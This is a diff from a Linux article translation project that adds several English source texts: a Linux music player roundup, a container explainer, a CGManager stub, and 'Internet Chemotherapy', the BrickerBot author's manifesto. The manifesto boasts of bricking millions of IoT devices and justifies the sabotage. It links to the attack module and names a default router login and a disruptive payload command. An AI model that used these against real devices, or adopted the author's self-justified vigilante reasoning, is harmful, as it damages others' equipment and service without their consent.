|
||||
|
||||
via: http://www.linuxandubuntu.com/home/linux-vs-unix
|
||||
|
||||
作者:[linuxandubuntu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.linuxandubuntu.com
|
||||
[1]:http://www.linuxandubuntu.com/home/linux-vs-unix
|
||||
[2]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix_orig.png
|
||||
[3]:http://www.unix.org/what_is_unix.html
|
||||
[4]:http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux_orig.png
|
||||
[5]:https://www.linux.com
|
144
sources/tech/20171215 Top 5 Linux Music Players.md
Normal file
144
sources/tech/20171215 Top 5 Linux Music Players.md
Normal file
@ -0,0 +1,144 @@
|
||||
Top 5 Linux Music Players
|
||||
======
|
||||
|
||||
![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/live-music.jpg?itok=Ejbo4rf7_)
|
||||
>Jack Wallen rounds up his five favorite Linux music players. Creative Commons Zero
|
||||
>Pixabay
|
||||
|
||||
No matter what you do, chances are you enjoy a bit of music playing in the background. Whether you're a coder, system administrator, or typical desktop user, enjoying good music might be at the top of your list of things you do on the desktop. And, with the holidays upon us, you might wind up with some gift cards that allow you to purchase some new music. If your music format of choice is of a digital nature (mine happens to be vinyl) and your platform is Linux, you're going to want a good GUI player to enjoy that music.
|
||||
|
||||
Fortunately, Linux has no lack of digital music players. In fact, there are quite a few, most of which are open source and available for free. Let's take a look at a few such players, to see which one might suit your needs.
|
||||
|
||||
### Clementine
|
||||
|
||||
I wanted to start out with the player that has served as my default for years. [Clementine][1] offers probably the single best ratio of ease-of-use to flexibility you'll find in any player. Clementine is a fork of the new defunct [Amarok][2] music player, but isn't limited to Linux-only; Clementine is also available for Mac OS and Windows platforms. The feature set is seriously impressive and includes the likes of:
|
||||
|
||||
* Built-in equalizer
|
||||
|
||||
* Customizable interface (display current album cover as background -- Figure 1)
|
||||
|
||||
* Play local music or from Spotify, Last.fm, and more
|
||||
|
||||
* Sidebar for easy library navigation
|
||||
|
||||
* Built-in audio transcoding (into MP3, OGG, Flac, and more)
|
||||
|
||||
* Remote control using [Android app][3]
|
||||
|
||||
* Handy search function
|
||||
|
||||
* Tabbed playlists
|
||||
|
||||
* Easy creation of regular and smart playlists
|
||||
|
||||
* CUE sheet support
|
||||
|
||||
* Tag support
|
||||
|
||||
|
||||
|
||||
|
||||
![Clementine][5]
|
||||
|
||||
|
||||
Figure 1: The Clementine interface might be a bit old-school, but it's incredibly user-friendly and flexible.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
Of all the music players I have used, Clementine is by far the most feature-rich and easy to use. It also includes one of the finest equalizers you'll find on a Linux music player (with 10 bands to adjust). Although it may not enjoy a very modern interface, it is absolutely unmatched for its ability to create and manipulate playlists. If your music collection is large, and you want total control over it, this is the player you want.
|
||||
|
||||
Clementine can be found in the standard repositories and installed from either your distribution's software center or the command line.
|
||||
|
||||
### Rhythmbox
|
||||
|
||||
[Rhythmbox][7] is the default player for the GNOME desktop, but it does function well on other desktops. The Rhythmbox interface is slightly more modern than Clementine and takes a minimal approach to design. That doesn't mean the app is bereft of features. Quite the opposite. Rhythmbox offers gapless playback, Soundcloud support, album cover display, audio scrobbling from Last.fm and Libre.fm, Jamendo support, podcast subscription (from [Apple iTunes][8]), web remote control, and more.
|
||||
|
||||
One very nice feature found in Rhythmbox is plugin support, which allows you to enable features like DAAP Music Sharing, FM Radio, Cover art search, notifications, ReplayGain, Song Lyrics, and more.
|
||||
|
||||
The Rhythmbox playlist feature isn't quite as powerful as that found in Clementine, but it still makes it fairly easy to organize your music into quick playlists for any mood. Although Rhythmbox does offer a slightly more modern interface than Clementine (Figure 2), it's not quite as flexible.
|
||||
|
||||
![Rhythmbox][10]
|
||||
|
||||
|
||||
Figure 2: The Rhythmbox interface is simple and straightforward.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
### VLC Media Player
|
||||
|
||||
For some, [VLC][11] cannot be beat for playing videos. However, VLC isn't limited to the playback of video. In fact, VLC does a great job of playing audio files. For [KDE Neon][12] users, VLC serves as your default for both music and video playback. Although VLC is one of the finest video players on the Linux market (it's my default), it does suffer from some minor limitations with audio--namely the lack of playlists and the inability to connect to remote directories on your network. But if you're looking for an incredibly simple and reliable means to play local files or network mms/rtsp streams VLC is a quality tool.
|
||||
|
||||
VLC does include an equalizer (Figure 3), a compressor, and a spatializer as well as the ability to record from a capture device.
|
||||
|
||||
![VLC][14]
|
||||
|
||||
|
||||
Figure 3: The VLC equalizer in action.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
### Audacious
|
||||
|
||||
If you're looking for a lightweight music player, Audacious perfectly fits that bill. This particular music player is fairly single minded, but it does include an equalizer and a small selection of effects that will please many an audiophile (e.g., Echo, Silence removal, Speed and Pitch, Voice Removal, and more--Figure 4).
|
||||
|
||||
![Audacious ][16]
|
||||
|
||||
|
||||
Figure 4: The Audacious EQ and plugins.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
Audacious also includes a really handy alarm feature, that allows you to set an alarm that will start playing your currently selected track at a user-specified time and duration.
|
||||
|
||||
### Spotify
|
||||
|
||||
I must confess, I use spotify daily. I'm a subscriber and use it to find new music to purchase--which means I am constantly searching and discovering. Fortunately, there is a desktop client for Spotify (Figure 5) that can be easily installed using the [official Spotify Linux installation instructions][17]. Outside of listening to vinyl, I probably make use of Spotify more than any other music player. It also helps that I can seamlessly jump between the desktop client and the [Android app][18], so I never miss out on the music I enjoy.
|
||||
|
||||
![Spotify][20]
|
||||
|
||||
|
||||
Figure 5: The official Spotify client on Linux.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
The Spotify interface is very easy to use and, in fact, it beats the web player by leaps and bounds. Do not settle for the [Spotify Web Player][21] on Linux, as the desktop client makes it much easier to create and manage your playlists. If you're a Spotify power user, don't even bother with the built-in support for the streaming client in the other desktop apps--once you've used the Spotify Desktop Client, the other apps pale in comparison.
|
||||
|
||||
### The choice is yours
|
||||
|
||||
Other options are available (check your desktop software center), but these five clients (in my opinion) are the best of the best. For me, the one-two punch of Clementine and Spotify gives me the best of all possible worlds. Try them out and see which one best meets your needs.
|
||||
|
||||
Learn more about Linux through the free ["Introduction to Linux" ][22]course from The Linux Foundation and edX.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/learn/intro-to-linux/2017/12/top-5-linux-music-players
|
||||
|
||||
作者:[][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com
|
||||
[1]:https://www.clementine-player.org/
|
||||
[2]:https://en.wikipedia.org/wiki/Amarok_(software)
|
||||
[3]:https://play.google.com/store/apps/details?id=de.qspool.clementineremote
|
||||
[4]:https://www.linux.com/files/images/clementinejpg
|
||||
[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/clementine.jpg?itok=_k13MtM3 (Clementine)
|
||||
[6]:https://www.linux.com/licenses/category/used-permission
|
||||
[7]:https://wiki.gnome.org/Apps/Rhythmbox
|
||||
[8]:https://www.apple.com/itunes/
|
||||
[9]:https://www.linux.com/files/images/rhythmboxjpg
|
||||
[10]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/rhythmbox.jpg?itok=GOjs9vTv (Rhythmbox)
|
||||
[11]:https://www.videolan.org/vlc/index.html
|
||||
[12]:https://neon.kde.org/
|
||||
[13]:https://www.linux.com/files/images/vlcjpg
|
||||
[14]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/vlc.jpg?itok=hn7iKkmK (VLC)
|
||||
[15]:https://www.linux.com/files/images/audaciousjpg
|
||||
[16]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/audacious.jpg?itok=9YALPzOx (Audacious )
|
||||
[17]:https://www.spotify.com/us/download/linux/
|
||||
[18]:https://play.google.com/store/apps/details?id=com.spotify.music
|
||||
[19]:https://www.linux.com/files/images/spotifyjpg
|
||||
[20]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/spotify.jpg?itok=P3FLfcYt (Spotify)
|
||||
[21]:https://open.spotify.com/browse/featured
|
||||
[22]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
335
sources/tech/20171218 Internet Chemotherapy.md
Normal file
335
sources/tech/20171218 Internet Chemotherapy.md
Normal file
@ -0,0 +1,335 @@
|
||||
Internet Chemotherapy
|
||||
======
|
||||
|
||||
12/10 2017
|
||||
|
||||
### 1. Internet Chemotherapy
|
||||
|
||||
Internet Chemotherapy was a 13 month project between Nov 2016 - Dec 2017.
|
||||
It has been known under names such as 'BrickerBot', 'bad firmware
|
||||
upgrade', 'ransomware', 'large-scale network failure' and even
|
||||
'unprecedented terrorist actions.' That last one was a little harsh,
|
||||
Fernandez, but I guess I can't please everybody.
|
||||
|
||||
You can download the module which executes the http and telnet-based
|
||||
payloads from this router at http://91.215.104.140/mod_plaintext.py. Due to
|
||||
platform limitations the module is obfuscated single threaded python, but
|
||||
the payloads are in plain view and should be easy to figure out for any
|
||||
programmer worth his/her/hir salt. Take a look at the number of payloads,
|
||||
0-days and techniques and let the reality sink in for a moment. Then
|
||||
imagine what would've happened to the Internet in 2017 if I had been a
|
||||
blackhat dedicated to building a massive DDoS cannon for blackmailing the
|
||||
biggest providers and companies. I could've disrupted them all and caused
|
||||
extraordinary damage to the Internet in the process.
|
||||
|
||||
My ssh crawler is too dangerous to publish. It contains various levels of
|
||||
automation for the purpose of moving laterally through poorly designed
|
||||
ISP networks and taking them over through only a single breached router.
|
||||
My ability to commandeer and secure hundreds of thousands of ISP routers
|
||||
was the foundation of my anti-IoT botnet project as it gave me great
|
||||
visibility of what was happening on the Internet and it gave me an
|
||||
endless supply of nodes for hacking back. I began my non-destructive ISP
|
||||
network cleanup project in 2015 and by the time Mirai came around I was
|
||||
in a good position to react. The decision to willfully sabotage other
|
||||
people's equipment was nonetheless a difficult one to make, but the
|
||||
colossally dangerous CVE-2016-10372 situation ultimately left me with no
|
||||
other choice. From that moment on I was all-in.
|
||||
|
||||
I am now here to warn you that what I've done was only a temporary band-
|
||||
aid and it's not going to be enough to save the Internet in the future.
|
||||
The bad guys are getting more sophisticated, the number of potentially
|
||||
vulnerable devices keep increasing, and it's only a matter of time before
|
||||
a large scale Internet-disrupting event will occur. If you are willing to
|
||||
believe that I've disabled over 10 million vulnerable devices over the 13-
|
||||
month span of the project then it's not far-fetched to say that such a
|
||||
destructive event could've already happened in 2017.
|
||||
|
||||
YOU SHOULD WAKE UP TO THE FACT THAT THE INTERNET IS ONLY ONE OR TWO
|
||||
SERIOUS IOT EXPLOITS AWAY FROM BEING SEVERELY DISRUPTED. The damage of
|
||||
such an event is immeasurable given how digitally connected our societies
|
||||
have become, yet CERTs, ISPs and governments are not taking the gravity
|
||||
of the situation seriously enough. ISPs keep deploying devices with
|
||||
exposed control ports and although these are trivially found using
|
||||
services like Shodan the national CERTs don't seem to care. A lot of
|
||||
countries don't even have CERTs. Many of the world's biggest ISPs do not
|
||||
have any actual security know-how in-house, and are instead relying on
|
||||
foreign vendors for help in case anything goes wrong. I've watched large
|
||||
ISPs withering for months under conditioning from my botnet without them
|
||||
being able to fully mitigate the vulnerabilities (good examples are BSNL,
|
||||
Telkom ZA, PLDT, from time to time PT Telkom, and pretty much most large
|
||||
ISPs south of the border). Just look at how slow and ineffective Telkom
|
||||
ZA was in dealing with its Aztech modem problem and you will begin to
|
||||
understand the hopelessness of the current situation. In 99% of the
|
||||
problem cases the solution would have simply been for the ISPs to deploy
|
||||
sane ACLs and CPE segmentation, yet months later their technical staff
|
||||
still hasn't figured this out. If ISPs are unable to mitigate weeks and
|
||||
months of continuous deliberate sabotage of their equipment then what
|
||||
hope is there that they would notice and fix a Mirai problem on their
|
||||
networks? Many of the world's biggest ISPs are catastrophically negligent
|
||||
and this is the biggest danger by a landslide, yet paradoxically it
|
||||
should also be the easiest problem to fix.
|
||||
|
||||
I've done my part to try to buy the Internet some time, but I've gone as
|
||||
far as I can. Now it's up to you. Even small actions are important. Among
|
||||
the things you can do are:
|
||||
|
||||
* Review your own ISP's security through services such as Shodan and take
|
||||
them to task over exposed telnet, http, httpd, ssh, tr069 etc. ports on
|
||||
their networks. Refer them to this document if you have to. There's no
|
||||
good reason why any of these control ports should ever be accessible
|
||||
from the outside world. Exposing control ports is an amateur mistake.
|
||||
If enough customers complain they might actually do something about it!
|
||||
|
||||
* Vote with your wallet! Refuse to buy or use 'intelligent' products
|
||||
unless the manufacturer can prove that the product can and will receive
|
||||
timely security updates. Find out about the vendor's security track
|
||||
record before giving them your hard-earned money. Be willing to pay a
|
||||
little bit more for credible security.
|
||||
|
||||
* Lobby your local politicians and government officials for improved
|
||||
security legislation for IoT (Internet of Things) devices such as
|
||||
routers, IP cameras and 'intelligent' devices. Private or public
|
||||
companies currently lack the incentives for solving this problem in the
|
||||
immediate term. This matter is as important as minimum safety
|
||||
requirements for cars and general electrical appliances.
|
||||
|
||||
* Consider volunteering your time or other resources to underappreciated
|
||||
whitehat organizations such as GDI Foundation or Shadowserver
|
||||
Foundation. These organizations and people make a big difference and
|
||||
they can significantly amplify the impact of your skillset in helping
|
||||
the Internet.
|
||||
|
||||
* Last but not least, consider the long-shot potential of getting IoT
|
||||
devices designated as an 'attractive nuisance' through precedent-
|
||||
setting legal action. If a home owner can be held liable for a
|
||||
burglar/trespasser getting injured then I don't see why a device owner
|
||||
(or ISP or manufacturer) shouldn't be held liable for the damage that
|
||||
was caused by their dangerous devices being exploitable through the
|
||||
Internet. Attribution won't be a problem for Layer 7 attacks. If any
|
||||
large ISPs with deep pockets aren't willing to fund such precedent
|
||||
cases (and they might not since they fear that such precedents could
|
||||
come back to haunt them) we could even crowdfund such initiatives over
|
||||
here and in the EU. ISPs: consider your volumetric DDoS bandwidth cost
|
||||
savings in 2017 as my indirect funding of this cause and as evidence
|
||||
for its potential upside.
|
||||
|
||||
### 2. Timeline
|
||||
|
||||
Here are some of the more memorable events of the project:
|
||||
|
||||
* Deutsche Telekom Mirai disruption in late November 2016. My hastily
|
||||
assembled initial TR069/64 payload only performed a 'route del default'
|
||||
but this was enough to get the ISP's attention to the problem and the
|
||||
resulting headlines alerted other ISPs around the world to the
|
||||
unfolding disaster.
|
||||
|
||||
* Around January 11-12 some Mirai-infected DVRs with exposed control port
|
||||
6789 ended up getting bricked in Washington DC, and this made numerous
|
||||
headlines. Gold star to Vemulapalli for determining that Mirai combined
|
||||
with /dev/urandom had to be 'highly sophisticated ransomware'. Whatever
|
||||
happened to those 2 unlucky souls in Europe?
|
||||
|
||||
* In late January 2017 the first genuine large-scale ISP takedown occured
|
||||
when Rogers Canada's supplier Hitron carelessly pushed out new firmware
|
||||
with an unauthenticated root shell listening on port 2323 (presumably
|
||||
this was a debugging interface that they forgot to disable). This epic
|
||||
blunder was quickly discovered by Mirai botnets, and the end-result was
|
||||
a large number of bricked units.
|
||||
|
||||
* In February 2017 I noticed the first Mirai evolution of the year, with
|
||||
both Netcore/Netis and Broadcom CLI-based modems being attacked. The
|
||||
BCM CLI would turn out to become one of the main Mirai battlegrounds of
|
||||
2017, with both the blackhats and me chasing the massive long tail of
|
||||
ISP and model-specific default credentials for the rest of the year.
|
||||
The 'broadcom' payloads in the above source may look strange but
|
||||
they're statistically the most likely sequences to disable any of the
|
||||
endless number of buggy BCM CLI firmwares out there.
|
||||
|
||||
* In March 2017 I significantly increased my botnet's node count and
|
||||
started to add more web payloads in response to the threats from IoT
|
||||
botnets such as Imeij, Amnesia and Persirai. The large-scale takedown
|
||||
of these hacked devices created a new set of concerns. For example,
|
||||
among the leaked credentials of the Avtech and Wificam devices there
|
||||
were logins which strongly implied airports and other important
|
||||
facilities, and around April 1 2017 the UK government officials
|
||||
warned of a 'credible cyber threat' to airports and nuclear
|
||||
facilities from 'hacktivists.' Oops.
|
||||
|
||||
* The more aggressive scanning also didn't escape the attention of
|
||||
civilian security researchers, and in April 6 2017 security company
|
||||
Radware published an article about my project. The company trademarked
|
||||
it under the name 'BrickerBot.' It became clear that if I were to
|
||||
continue increasing the scale of my IoT counteroffensive I had to come
|
||||
up with better network mapping/detection methods for honeypots and
|
||||
other risky targets.
|
||||
|
||||
* Around April 11th 2017 something very unusual happened. At first it
|
||||
started like so many other ISP takedowns, with a semi-local ISP called
|
||||
Sierra Tel running exposed Zyxel devices with the default telnet login
|
||||
of supervisor/zyad1234. A Mirai runner discovered the exposed devices
|
||||
and my botnet followed soon after, and yet another clash in the epic
|
||||
BCM CLI war of 2017 took place. This battle didn't last long. It
|
||||
would've been just like any of the hundreds of other ISP takedowns in
|
||||
2017 were it not for something very unusual occuring right after the
|
||||
smoke settled. Amazingly, the ISP didn't try to cover up the outage as
|
||||
some kind of network issue, power spike or a bad firmware upgrade. They
|
||||
didn't lie to their customers at all. Instead, they promptly published
|
||||
a press release about their modems having been vulnerable which allowed
|
||||
their customers to assess their potential risk exposure. What did the
|
||||
most honest ISP in the world get for its laudable transparency? Sadly
|
||||
it got little more than criticism and bad press. It's still the most
|
||||
depressing case of 'why we can't have nice things' to me, and probably
|
||||
the main reason for why 99% of security mistakes get covered up and the
|
||||
actual victims get left in the dark. Too often 'responsible disclosure'
|
||||
simply becomes a euphemism for 'coverup.'
|
||||
|
||||
* On April 14 2017 DHS warned of 'BrickerBot Threat to Internet of
|
||||
Things' and the thought of my own government labeling me as a cyber
|
||||
threat felt unfair and myopic. Surely the ISPs that run dangerously
|
||||
insecure network deployments and the IoT manufacturers that peddle
|
||||
amateurish security implementations should have been fingered as the
|
||||
actual threat to Americans rather than me? If it hadn't been for me
|
||||
millions of us would still be doing their banking and other sensitive
|
||||
transactions over hacked equipment and networks. If anybody from DHS
|
||||
ever reads this I urge you to reconsider what protecting the homeland
|
||||
and its citizens actually means.
|
||||
|
||||
* In late April 2017 I spent some time on improving my TR069/64 attack
|
||||
methods, and in early May 2017 a company called Wordfence (now Defiant)
|
||||
reported a significant decline in a TR069-exploiting botnet that had
|
||||
previously posed a threat to Wordpress installations. It's noteworthy
|
||||
that the same botnet temporarily returned a few weeks later using a
|
||||
different exploit (but this was also eventually mitigated).
|
||||
|
||||
* In May 2017 hosting company Akamai reported in its Q1 2017 State of the
|
||||
Internet report an 89% decrease in large (over 100 Gbps) DDoS attacks
|
||||
compared with Q1 2016, and a 30% decrease in total DDoS attacks. The
|
||||
largest attack of Q1 2017 was 120 Gbps vs 517 Gbps in Q4 2016. As large
|
||||
volumetric DDoS was one of the primary signatures of Mirai this felt
|
||||
like concrete justification for all the months of hard work in the IoT
|
||||
trenches.
|
||||
|
||||
* During the summer I kept improving my exploit arsenal, and in late July
|
||||
I performed some test runs against APNIC ISPs. The results were quite
|
||||
surprising. Among other outcomes a few hundred thousand BSNL and MTNL
|
||||
modems were disabled and this outage become headline news in India.
|
||||
Given the elevated geopolitical tensions between India and China at the
|
||||
time I felt that there was a credible risk of the large takedown being
|
||||
blamed on China so I made the rare decision to publically take credit
|
||||
for it. Catalin, I'm very sorry for the abrupt '2 day vacation' that
|
||||
you had to take after reporting the news.
|
||||
|
||||
* Previously having worked on APNIC and AfriNIC, on August 9th 2017 I
|
||||
also launched a large scale cleanup of LACNIC space which caused
|
||||
problems for various providers across the subcontinent. The attack made
|
||||
headlines in Venezuela after a few million cell phone users of Movilnet
|
||||
lost service. Although I'm personally against government surveillance
|
||||
of the Internet the case of Venezuela is noteworthy. Many of the
|
||||
LACNIC ISPs and networks have been languishing for months under
|
||||
persistent conditioning from my botnet, but Venezuelan providers have
|
||||
been quick to fortify their networks and secure their infrastructure.
|
||||
I believe this is due to Venezuela engaging in far more invasive deep
|
||||
packet inspection than the other LACNIC countries. Food for thought.
|
||||
|
||||
* In August 2017 F5 Labs released a report called "The Hunt for IoT: The
|
||||
Rise of Thingbots" in which the researchers were perplexed over the
|
||||
recent lull in telnet activity. The researchers speculated that the
|
||||
lack of activity may be evidence that one or more very large cyber
|
||||
weapons are being built (which I guess was in fact true). This piece
|
||||
is to my knowledge the most accurate assessment of the scope of my
|
||||
project but fascinatingly the researchers were unable to put two and
|
||||
two together in spite of gathering all the relevant clues on a single
|
||||
page.
|
||||
|
||||
* In August 2017 Akamai's Q2 2017 State of the Internet report announces
|
||||
the first quarter in 3 years without the provider observing a single
|
||||
large (over 100 Gbps) attack, and a 28% decrease in total DDoS attacks
|
||||
vs Q1 2017. This seems like further validation of the cleanup effort.
|
||||
This phenomenally good news is completely ignored by the mainstream
|
||||
media which operates under an 'if it bleeds it leads' mentality even
|
||||
when it comes to information security. This is yet another reason why
|
||||
we can't have nice things.
|
||||
|
||||
* After the publication of CVE-2017-7921 and 7923 in September 2017 I
|
||||
decided to take a closer look at Hikvision devices, and to my horror
|
||||
I realized that there's a technique for botting most of the vulnerable
|
||||
firmwares that the blackhats hadn't discovered yet. As a result I
|
||||
launched a global cleanup initiative around mid-September. Over a
|
||||
million DVRs and cameras (mainly Hikvision and Dahua) were disabled
|
||||
over a span of 3 weeks and publications such as IPVM.com wrote several
|
||||
articles about the attacks. Dahua and Hikvision wrote press releases
|
||||
mentioning or alluding to the attacks. A huge number of devices finally
|
||||
got their firmwares upgraded. Seeing the confusion that the cleanup
|
||||
effort caused I decided to write a quick summary for the CCTV people at
|
||||
http://depastedihrn3jtw.onion.link/show.php?md5=62d1d87f67a8bf485d43a05ec32b1e6f
|
||||
(sorry for the NSFW language of the pastebin service). The staggering
|
||||
number of vulnerable units that were online months after critical
|
||||
security patches were available should be the ultimate wakeup call to
|
||||
everyone about the utter dysfunctionality of the current IoT patching
|
||||
process.
|
||||
|
||||
* Around September 28 2017 Verisign releases a report saying that DDoS
|
||||
attacks declined 55% in Q2 2017 vs Q1, with a massive 81% attack peak
|
||||
decline.
|
||||
|
||||
* On November 23rd 2017 the CDN provider Cloudflare reports that 'in
|
||||
recent months, Cloudflare has seen a dramatic reduction in simple
|
||||
attempts to flood our network with junk traffic.' Cloudflare speculates
|
||||
it could've partly been due to their change in policies, but the
|
||||
reductions also line up well with the IoT cleanup activities.
|
||||
|
||||
* At the end of November 2017 Akamai's Q3 2017 State of the Internet
|
||||
report sees a small 8% increase in total DDoS attacks for the quarter.
|
||||
Although this was a significant reduction compared to Q3 2016 the
|
||||
slight uptick serves as a reminder of the continued risks and dangers.
|
||||
|
||||
* As a further reminder of the dangers a new Mirai strain dubbed 'Satori'
|
||||
reared its head in November-December of 2017. It's particularly
|
||||
noteworthy how quickly the botnet managed to grow based on a single
|
||||
0-day exploit. This event underlines the current perilous operating
|
||||
state of the Internet, and why we're only one or two severe IoT
|
||||
exploits away from widespread disruption. What will happen when nobody
|
||||
is around to disable the next threat? Sinkholing and other whitehat/
|
||||
'legal' mitigations won't be enough in 2018 just like they weren't
|
||||
enough in 2016. Perhaps in the future governments will be able to
|
||||
collaborate on a counterhacking task force with a global mandate for
|
||||
disabling particularly severe existential threats to the Internet, but
|
||||
I'm not holding my breath.
|
||||
|
||||
* Late in the year there were also some hysterical headlines regarding a
|
||||
new botnet that was dubbed 'Reaper' and 'IoTroop'. I know some of you
|
||||
will eventually ridicule those who estimated its size at 1-2 million
|
||||
but you should understand that security researchers have very limited
|
||||
knowledge of what's happening on networks and hardware that they don't
|
||||
control. In practice the researchers could not possibly have known or
|
||||
even assumed that most of the vulnerable device pool had already been
|
||||
disabled by the time the botnet emerged. Give the 'Reaper' one or two
|
||||
new unmitigated 0-days and it'll become as terrifying as our worst
|
||||
fears.
|
||||
|
||||
### 3. Parting Thoughts
|
||||
|
||||
I'm sorry to leave you in these circumstances, but the threat to my own
|
||||
safety is becoming too great to continue. I have made many enemies. If
|
||||
you want to help look at the list of action items further up. Good luck.
|
||||
|
||||
There will also be those who will criticize me and say that I've acted
|
||||
irresponsibly, but that's completely missing the point. The real point
|
||||
is that if somebody like me with no previous hacking background was able
|
||||
to do what I did, then somebody better than me could've done far worse
|
||||
things to the Internet in 2017. I'm not the problem and I'm not here to
|
||||
play by anyone's contrived rules. I'm only the messenger. The sooner you
|
||||
realize this the better.
|
||||
|
||||
-Dr Cyborkian a.k.a. janit0r, conditioner of 'terminally ill' devices.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via:https://ghostbin.com/paste/q2vq2
|
||||
|
||||
作者:janit0r
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,
|
||||
[Linux中国](https://linux.cn/) 荣誉推出
|
@ -0,0 +1,61 @@
|
||||
Translating by lonaparte
|
||||
|
||||
What Are Containers and Why Should You Care?
|
||||
======
|
||||
What are containers? Do you need them? Why? In this article, we aim to answer some of these basic questions.
|
||||
|
||||
But, to answer these questions, we need more questions. When you start considering how containers might fit into your world, you need to ask: Where do you develop your application? Where do you test it and where is it deployed?
|
||||
|
||||
You likely develop your application on your work laptop, which has all the libraries, packages, tools, and framework needed to run that application. It's tested on a platform that resembles the production machine and then it's deployed in production. The problem is that not all three environments are the same; they don't have same tools, frameworks, and libraries. And, the app that works on your dev machine may not work in the production environment.
|
||||
|
||||
Containers solved that problem. As Docker explains, "a container image is a lightweight, standalone, executable package of a piece of software that includes everything needed to run it: code, runtime, system tools, system libraries, settings."
|
||||
|
||||
What this means is that once an application is packaged as a container, the underlying environment doesn't really matter. It can run anywhere, even on a multi-cloud environment. That's one of the many reasons containers became so popular among developers, operations teams, and even CIOs.
|
||||
|
||||
### Containers for developers
|
||||
|
||||
Now developers or operators don't have to concern themselves with what platforms they are using to run applications. Devs don't have to tell ops that "it worked on my system" anymore.
|
||||
|
||||
Another big advantage of containers is isolation and security. Because containers isolate the app from the platform, the app remains safe and keeps everything around it safe. At the same time, different teams can run different applications on the same infrastructure at the same time -- something that's not possible with traditional apps.
|
||||
|
||||
Isn't that what virtual machines (VM) offer? Yes and no. VMs do offer isolation, but they have massive overhead. [In a white paper][1], Canonical compared containers with VM and wrote, "Containers offer a new form of virtualization, providing almost equivalent levels of resource isolation as a traditional hypervisor. However, containers are lower overhead both in terms of lower memory footprint and higher efficiency. This means higher density can be achieved -- simply put, you can get more for the same hardware." Additionally, VMs take longer to provision and start; containers can be spinned up in seconds, and they boot instantly.
|
||||
|
||||
### Containers for ecosystem
|
||||
|
||||
A massive ecosystem of vendors and solutions now enable companies to deploy containers at scale, whether it's orchestration, monitoring, logging, or lifecycle management.
|
||||
|
||||
To ensure that containers run everywhere, the container ecosystem came together to form the [Open Container Initiative][2] (OCI), a Linux Foundation project to create specifications around two core components of containers -- container runtime and container image format. These two specs ensure that there won't be any fragmentation in the container space.
|
||||
|
||||
For a long time, containers were specific to the Linux kernel, but Microsoft has been working closely with Docker to bring support for containers on Microsoft's platform. Today you can run containers on Linux, Windows, Azure, AWS, Google Compute Engine, Rackspace, and mainframes. Even VMware is adopting containers with [vSphere Integrated Container][3] (VIC), which lets IT pros run containers and traditional workloads on their platforms.
|
||||
|
||||
### Containers for CIOs
|
||||
|
||||
Containers are very popular among developers for all the reasons mentioned above, and they offer great advantages for CIOs, too. The biggest advantage of moving to containerized workloads is changing the way companies operate.
|
||||
|
||||
Traditional applications have a life-cycle of a about a decade. New versions are released after years of work and because they are platform dependent, sometimes they don't see production for years. Due to this lifecycle, developers try to cram in as many features as they can, which can make the application monolithic, big, and buggy.
|
||||
|
||||
This process affects the innovative culture within companies. When people don't see their ideas translated into products for months and years, they are demotivated.
|
||||
|
||||
Containers solve that problem, because you can break the app into smaller microservices. You can develop, test, and deploy in a matter of weeks or days. New features can be added as new containers. They can go into production as soon as they are out of testing. Companies can move faster and stay ahead of the competitors. This approach breeds innovation as ideas can be translated into containers and deployed quickly.
|
||||
|
||||
### Conclusion
|
||||
|
||||
Containers solve many problems that traditional workloads face. However, they are not the answer to every problem facing IT professionals. They are one of many solutions. In the next article, we'll cover some of the basic terminology of containers, and then we will explain how to get started with containers.
|
||||
|
||||
Learn more about Linux through the free ["Introduction to Linux" ][4] course from The Linux Foundation and edX.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/intro-to-Linux/2017/12/what-are-containers-and-why-should-you-care
|
||||
|
||||
作者:[wapnil Bhartiya][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/arnieswap
|
||||
[1]:https://www.ubuntu.com/containers
|
||||
[2]:https://www.opencontainers.org/
|
||||
[3]:https://www.vmware.com/products/vsphere/integrated-containers.html
|
||||
[4]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
72
sources/tech/20171218 Whats CGManager.md
Normal file
72
sources/tech/20171218 Whats CGManager.md
Normal file
@ -0,0 +1,72 @@
|
||||
translating---geekpi
|
||||
|
||||
What's CGManager?[][1]
|
||||
============================================================
|
||||
|
||||
CGManager is a central privileged daemon that manages all your cgroups for you through a simple D-Bus API. It's designed to work with nested LXC containers as well as accepting unprivileged requests including resolving user namespaces UIDs/GIDs.
|
||||
|
||||
# Components[][2]
|
||||
|
||||
### cgmanager[][3]
|
||||
|
||||
